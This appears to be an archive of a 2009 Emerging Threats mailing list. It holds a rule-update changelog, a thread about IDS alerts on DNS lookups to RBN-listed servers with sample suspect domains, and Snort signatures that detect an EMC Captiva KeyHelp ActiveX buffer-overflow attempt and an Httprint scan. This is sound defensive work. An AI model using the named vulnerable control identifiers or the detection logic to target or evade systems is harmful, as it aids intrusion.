        2500548 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500549 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500550 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500551 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500552 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500553 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500554 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500555 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500556 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500557 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500558 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500559 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500560 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500561 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510540 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510541 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510544 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510545 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510546 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510547 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510548 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510549 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510550 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510551 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510552 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510553 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510554 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510555 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510556 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510557 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510558 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510559 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510560 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510561 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (46):
        2010441 || ET TROJAN Possible Storm Variant HTTP Post (S) || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2010442 || ET TROJAN Possible Storm Variant HTTP Post (U) || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2500540 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500541 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500544 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500545 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500546 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500547 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500548 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500549 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500550 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500551 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500552 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500553 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500554 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500555 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500556 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500557 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500558 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500559 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500560 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500561 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510540 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510541 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510544 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510545 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510546 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510547 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510548 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510549 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510550 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510551 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510552 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510553 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510554 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510555 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510556 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510557 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510558 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510559 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510560 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510561 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-virus.rules (1):
        #by packet hack


From wkitty42 at windstream.net  Wed Dec  2 23:14:35 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Wed, 02 Dec 2009 23:14:35 -0500
Subject: [Emerging-Sigs] RBN sigs?
In-Reply-To: <F236CDCE34685A458D315422458642E201D307E0@pine.nhrs.org>
References: <F236CDCE34685A458D315422458642E201D307E0@pine.nhrs.org>
Message-ID: <4B173B2B.5010908@windstream.net>

is that machine looking there for all DNS lookups or only some?? i'm thinking 
that the machine may have been compromised with one of those DNS changers but 
likely not if only some lookups are going to RBN machines...

Weir, Jason wrote:
> Good idea - had not thought of that but doubtful - currently successful
> inbound spam delivery numbers are never higher than 5 a day (low email
> traffic <1000 daily, and a good spam filter) - I'm seeing much higher
> sig triggers...
> 
> -J
> 
> -----Original Message-----
> From: Matthew Jonkman [mailto:jonkman at jonkmans.com] 
> Sent: Tuesday, December 01, 2009 3:27 PM
> To: Weir, Jason
> Cc: Emerging-Sigs
> Subject: Re: [Emerging-Sigs] RBN sigs?
> 
> 
> Inbound spam reverse lookups?
> 
> Matt
> 
> On Dec 1, 2009, at 2:25 PM, Weir, Jason wrote:
> 
>> I'm seeing quite a few alerts on the RBN UDP rules - dest address is
>> always one of my internal DNS boxes src port 53 and the traffic looks
>> like valid responses to DNS queries.  FW logs confirm the outbound DNS
>> query.
>>
>> No other RBN sigs are triggering.  
>>
>> Can someone give me a scenario where I'm doing lookups to and
> receiving
>> responses from DNS servers on the RBN list for hosts not on the RBN?
>> Hope I worded that right. Just seems odd..
>>
>> -Jason
> 
> 
> _____________________________________________________________________________________________
> 
> Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 


From wkitty42 at windstream.net  Wed Dec  2 23:27:19 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Wed, 02 Dec 2009 23:27:19 -0500
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <F236CDCE34685A458D315422458642E201D307E5@pine.nhrs.org>
References: <F236CDCE34685A458D315422458642E201D307E5@pine.nhrs.org>
Message-ID: <4B173E27.2080600@windstream.net>


were the installer_1.exe and installer.1.exe ones missed? i know that someone 
posted something on them but don't recall if they were accepted or not... it may 
have been "install" instead of "installer" but there's two of 'em in the list a 
few lines apart...

Weir, Jason wrote:
> Matt,
> 
> Let me know the sig # and I'll update the list..
> 
> -J
> 
> -----Original Message-----
> From: Matthew Jonkman [mailto:jonkman at jonkmans.com] 
> Sent: Tuesday, December 01, 2009 3:02 PM
> To: Weir, Jason
> Cc: emerging-sigs at emergingthreats.net
> Subject: Re: [Emerging-Sigs] Malwareurl.com Top 30 Update
> 
> 
> I like "flash-HQ-plugin.40000.exe" for a sig. Will post something. 
> 
> Anyone see anything else we need to get in this list?
> 
> Matt
> 
> 
> _____________________________________________________________________________________________
> 
> Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 


From jason.weir at nhrs.org  Thu Dec  3 07:22:08 2009
From: jason.weir at nhrs.org (Weir, Jason)
Date: Thu, 3 Dec 2009 07:22:08 -0500
Subject: [Emerging-Sigs] RBN sigs?
In-Reply-To: <4B173B2B.5010908@windstream.net>
Message-ID: <F236CDCE34685A458D315422458642E201D3080A@pine.nhrs.org>

Nope - only some lookups and it's only to a select group of IPs.

I sent the IPs to James McQuaid who maintains the RBN list and of the 18
IPs I sent he was able to remove 7, that still leaves 11 hostile
machines I'm forwarding lookups to - actually raises more questions than
it answers.

I'm going to look at it some more today.  I'm using MS DNS and it's
logging is somewhat useless.

But - there was only 1 trigger overnight so I believe these lookups are
part of normal user browsing and should pick back up during the day
today.

-J

-----Original Message-----
From: emerging-sigs-bounces at emergingthreats.net
[mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of waldo
kitty
Sent: Wednesday, December 02, 2009 11:15 PM
To: Emerging-Sigs
Subject: Re: [Emerging-Sigs] RBN sigs?


is that machine looking there for all DNS lookups or only some?? i'm
thinking 
that the machine may have been compromised with one of those DNS
changers but 
likely not if only some lookups are going to RBN machines...

Weir, Jason wrote:
> Good idea - had not thought of that but doubtful - currently
successful
> inbound spam delivery numbers are never higher than 5 a day (low email
> traffic <1000 daily, and a good spam filter) - I'm seeing much higher
> sig triggers...
> 
> -J
> 
> -----Original Message-----
> From: Matthew Jonkman [mailto:jonkman at jonkmans.com] 
> Sent: Tuesday, December 01, 2009 3:27 PM
> To: Weir, Jason
> Cc: Emerging-Sigs
> Subject: Re: [Emerging-Sigs] RBN sigs?
> 
> 
> Inbound spam reverse lookups?
> 
> Matt
> 
> On Dec 1, 2009, at 2:25 PM, Weir, Jason wrote:
> 
>> I'm seeing quite a few alerts on the RBN UDP rules - dest address is
>> always one of my internal DNS boxes src port 53 and the traffic looks
>> like valid responses to DNS queries.  FW logs confirm the outbound
DNS
>> query.
>>
>> No other RBN sigs are triggering.  
>>
>> Can someone give me a scenario where I'm doing lookups to and
> receiving
>> responses from DNS servers on the RBN list for hosts not on the RBN?
>> Hope I worded that right. Just seems odd..
>>
>> -Jason


_____________________________________________________________________________________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.

From pepperjack at afferentsecurity.com  Thu Dec  3 08:06:36 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Thu, 03 Dec 2009 07:06:36 -0600
Subject: [Emerging-Sigs] RBN sigs?
In-Reply-To: <F236CDCE34685A458D315422458642E201D3080A@pine.nhrs.org>
References: <F236CDCE34685A458D315422458642E201D3080A@pine.nhrs.org>
Message-ID: <20091203070636.82jytsg274g0w0ws@mail.afferentsecurity.com>

What domains was it looking for?

jp

Quoting "Weir, Jason" <jason.weir at nhrs.org>:

> Nope - only some lookups and it's only to a select group of IPs.
>
> I sent the IPs to James McQuaid who maintains the RBN list and of the 18
> IPs I sent he was able to remove 7, that still leaves 11 hostile
> machines I'm forwarding lookups to - actually raises more questions than
> it answers.
>
> I'm going to look at it some more today.  I'm using MS DNS and it's
> logging is somewhat useless.
>
> But - there was only 1 trigger overnight so I believe these lookups are
> part of normal user browsing and should pick back up during the day
> today.
>
> -J
>
> -----Original Message-----
> From: emerging-sigs-bounces at emergingthreats.net
> [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of waldo
> kitty
> Sent: Wednesday, December 02, 2009 11:15 PM
> To: Emerging-Sigs
> Subject: Re: [Emerging-Sigs] RBN sigs?
>
>
> is that machine looking there for all DNS lookups or only some?? i'm
> thinking
> that the machine may have been compromised with one of those DNS
> changers but
> likely not if only some lookups are going to RBN machines...
>
> Weir, Jason wrote:
>> Good idea - had not thought of that but doubtful - currently
> successful
>> inbound spam delivery numbers are never higher than 5 a day (low email
>> traffic <1000 daily, and a good spam filter) - I'm seeing much higher
>> sig triggers...
>>
>> -J
>>
>> -----Original Message-----
>> From: Matthew Jonkman [mailto:jonkman at jonkmans.com]
>> Sent: Tuesday, December 01, 2009 3:27 PM
>> To: Weir, Jason
>> Cc: Emerging-Sigs
>> Subject: Re: [Emerging-Sigs] RBN sigs?
>>
>>
>> Inbound spam reverse lookups?
>>
>> Matt
>>
>> On Dec 1, 2009, at 2:25 PM, Weir, Jason wrote:
>>
>>> I'm seeing quite a few alerts on the RBN UDP rules - dest address is
>>> always one of my internal DNS boxes src port 53 and the traffic looks
>>> like valid responses to DNS queries.  FW logs confirm the outbound
> DNS
>>> query.
>>>
>>> No other RBN sigs are triggering.
>>>
>>> Can someone give me a scenario where I'm doing lookups to and
>> receiving
>>> responses from DNS servers on the RBN list for hosts not on the RBN?
>>> Hope I worded that right. Just seems odd..
>>>
>>> -Jason
>
>
> _____________________________________________________________________________________________
>
> Please visit www.nhrs.org to subscribe to NHRS email announcements  
> and updates.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From kevross33 at googlemail.com  Thu Dec  3 08:38:45 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Thu, 3 Dec 2009 13:38:45 +0000
Subject: [Emerging-Sigs] 1 new sig and some improvements
Message-ID: <e75cc74a0912030538r2ee9851br10d55ac68be9841c@mail.gmail.com>

See comments above rules:
Kev

# SUPERFICIAL CHANGES: Additional Reference & addition of EMC product in msg
to identify product, changed flow to to_client rather than from_server,
revision count incremented
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT
ACTIVEX Possible EMC Captiva QuickScan Pro KeyWorks KeyHelp Module
keyhelp.ocx ActiveX Control Remote Buffer Overflow Attempt";
flow:to_client,established; content:"clsid"; nocase;
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; nocase; distance:0;
content:"KEYHELP"; nocase;
pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*B7ECFD41-BE62-11D2-B9A8-00104B138C8C/si";
classtype:attempted-user; reference:url,www.securityfocus.com/bid/36546/info;
reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=19135;
reference:url,
downloads.securityfocus.com/vulnerabilities/exploits/36546.html;
reference:url,doc.emergingthreats.net/2010012; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Keyworks;
sid:2010012; rev:5;)

# NEW SIG: And a new sig to provide addional coverage for this
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"ET WEB_CLIENT
ACTIVEX Possible EMC Captiva QuickScan Pro KeyWorks KeyHelp Module
keyhelp.ocx ActiveX Control Remote Buffer Overflow Function Call Attempt";
flow:to_client,established; content:"ActiveXObject"; nocase;
content:"KeyHelp|2E|KeyCtrl|2E|1"; nocase; distance:0; content:"KEYHELP";
nocase; classtype:attempted-user; reference:url,
www.securityfocus.com/bid/36546/info; reference:url,
tools.cisco.com/security/center/viewAlert.x?alertId=19135; reference:url,
downloads.securityfocus.com/vulnerabilities/exploits/36546.html;
sid:1700001; rev:1;)

# PERFORMANCE FIX: Fixed Flow to be before content match for performance,
added in Hex (my preference lol) and incremented the revision number and
then tested
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN
Httprint Web Server Fingerprint Scan"; flow:to_server,established;
content:"GET|20 2F|antidisestablishmentarianism"; depth:33;
classtype:attempted-recon; reference:url,www.net-square.com/httprint/;
reference:url,www.net-square.com/httprint/httprint_paper.html;
reference:url,doc.emergingthreats.net/2008416; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Httprint;
sid:2008416; rev:3;)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091203/43013890/attachment.html

From jason.weir at nhrs.org  Thu Dec  3 09:36:32 2009
From: jason.weir at nhrs.org (Weir, Jason)
Date: Thu, 3 Dec 2009 09:36:32 -0500
Subject: [Emerging-Sigs] RBN sigs?
In-Reply-To: <20091203070636.82jytsg274g0w0ws@mail.afferentsecurity.com>
Message-ID: <F236CDCE34685A458D315422458642E201D30813@pine.nhrs.org>

Varies - but here is a sample

www.thg.ru
Ttmp3.com
icons.payplay.fm
www.learnbydestroying.com

Nothing that looks like legit traffic there - wonder if this is drive by
stuff (malware,adware) on otherwise legit sites - I've been blocking
them (dns servers) at the ip level so far today with no outrage from the
end users yet...

=J


-----Original Message-----
From: emerging-sigs-bounces at emergingthreats.net
[mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Jack
Pepper
Sent: Thursday, December 03, 2009 8:07 AM
To: emerging-sigs at emergingthreats.net
Subject: Re: [Emerging-Sigs] RBN sigs?


What domains was it looking for?

jp

Quoting "Weir, Jason" <jason.weir at nhrs.org>:

> Nope - only some lookups and it's only to a select group of IPs.
>
> I sent the IPs to James McQuaid who maintains the RBN list and of the
18
> IPs I sent he was able to remove 7, that still leaves 11 hostile
> machines I'm forwarding lookups to - actually raises more questions
than
> it answers.
>
> I'm going to look at it some more today.  I'm using MS DNS and it's
> logging is somewhat useless.
>
> But - there was only 1 trigger overnight so I believe these lookups
are
> part of normal user browsing and should pick back up during the day
> today.
>
> -J
>
> -----Original Message-----
> From: emerging-sigs-bounces at emergingthreats.net
> [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of waldo
> kitty
> Sent: Wednesday, December 02, 2009 11:15 PM
> To: Emerging-Sigs
> Subject: Re: [Emerging-Sigs] RBN sigs?
>
>
> is that machine looking there for all DNS lookups or only some?? i'm
> thinking
> that the machine may have been compromised with one of those DNS
> changers but
> likely not if only some lookups are going to RBN machines...
>
> Weir, Jason wrote:
>> Good idea - had not thought of that but doubtful - currently
> successful
>> inbound spam delivery numbers are never higher than 5 a day (low
email
>> traffic <1000 daily, and a good spam filter) - I'm seeing much higher
>> sig triggers...
>>
>> -J
>>
>> -----Original Message-----
>> From: Matthew Jonkman [mailto:jonkman at jonkmans.com]
>> Sent: Tuesday, December 01, 2009 3:27 PM
>> To: Weir, Jason
>> Cc: Emerging-Sigs
>> Subject: Re: [Emerging-Sigs] RBN sigs?
>>
>>
>> Inbound spam reverse lookups?
>>
>> Matt
>>
>> On Dec 1, 2009, at 2:25 PM, Weir, Jason wrote:
>>
>>> I'm seeing quite a few alerts on the RBN UDP rules - dest address is
>>> always one of my internal DNS boxes src port 53 and the traffic
looks
>>> like valid responses to DNS queries.  FW logs confirm the outbound
> DNS
>>> query.
>>>
>>> No other RBN sigs are triggering.
>>>
>>> Can someone give me a scenario where I'm doing lookups to and
>> receiving
>>> responses from DNS servers on the RBN list for hosts not on the RBN?
>>> Hope I worded that right. Just seems odd..
>>>
>>> -Jason
>
>
>
________________________________________________________________________
_____________________
>
> Please visit www.nhrs.org to subscribe to NHRS email announcements  
> and updates.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com

_______________________________________________
Emerging-sigs mailing list
Emerging-sigs at emergingthreats.net
http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs



________________________________________________________________________
_____________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and
updates.


_____________________________________________________________________________________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.

From mike.cox52 at gmail.com  Thu Dec  3 12:06:40 2009
From: mike.cox52 at gmail.com (Mike Cox)
Date: Thu, 3 Dec 2009 11:06:40 -0600
Subject: [Emerging-Sigs] Is the VRT ruleset worth it?
Message-ID: <6116b9e20912030906p7647df0exa625f9c71b4b3fa1@mail.gmail.com>

Let me preface this by saying I am not trying to start a flame war or troll
so please don't take it that way.

As I understand it, the ET sigs are more malware/trojan based and the VRT
sigs are more exploit/general vulnerability based.  I am considering
subscribing to the VRT ruleset and am curious as to people's experience and
opinions about doing so.  Is it worth it?  What benefit do you get?  From
what I can tell, you get rules 30 days in advance of the rest of the world.
This can be nice for thinks like MS patches and flash 0day but still, is it
worthwhile?  Also, I am concerned about a lot of false positives and as I
understand it, a lot of rules are released GID 3 which means when I see
alerts, I can't inspect the rule in order to see why it fired and determine
if it is a false positive or not.

All feedback is welcome.  Feel free to email me off list if you don't want
to broadcast your opinion to everyone here.  Thanks.

Mike Cox
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091203/51df71c5/attachment.html

From guise.mcallaster at gmail.com  Thu Dec  3 12:31:24 2009
From: guise.mcallaster at gmail.com (Guise McAllaster)
Date: Thu, 3 Dec 2009 17:31:24 +0000
Subject: [Emerging-Sigs] Is the VRT ruleset worth it?
In-Reply-To: <6116b9e20912030906p7647df0exa625f9c71b4b3fa1@mail.gmail.com>
References: <6116b9e20912030906p7647df0exa625f9c71b4b3fa1@mail.gmail.com>
Message-ID: <ab3c24b60912030931r43c840fu228045e742dcfcb9@mail.gmail.com>

I think everyone has to form their own opinion on this issue but I've always
thought of using the VRT ruleset alongside the ET ruleset as wearing two
condoms -- it doesn't offer more protection and it decreases sensitivity.

Guise

On Thu, Dec 3, 2009 at 5:06 PM, Mike Cox <mike.cox52 at gmail.com> wrote:

> Let me preface this by saying I am not trying to start a flame war or troll
> so please don't take it that way.
>
> As I understand it, the ET sigs are more malware/trojan based and the VRT
> sigs are more exploit/general vulnerability based.  I am considering
> subscribing to the VRT ruleset and am curious as to people's experience and
> opinions about doing so.  Is it worth it?  What benefit do you get?  From
> what I can tell, you get rules 30 days in advance of the rest of the world.
> This can be nice for thinks like MS patches and flash 0day but still, is it
> worthwhile?  Also, I am concerned about a lot of false positives and as I
> understand it, a lot of rules are released GID 3 which means when I see
> alerts, I can't inspect the rule in order to see why it fired and determine
> if it is a false positive or not.
>
> All feedback is welcome.  Feel free to email me off list if you don't want
> to broadcast your opinion to everyone here.  Thanks.
>
> Mike Cox
>
> _______________________________________________
> Emerging-sigs mailing list
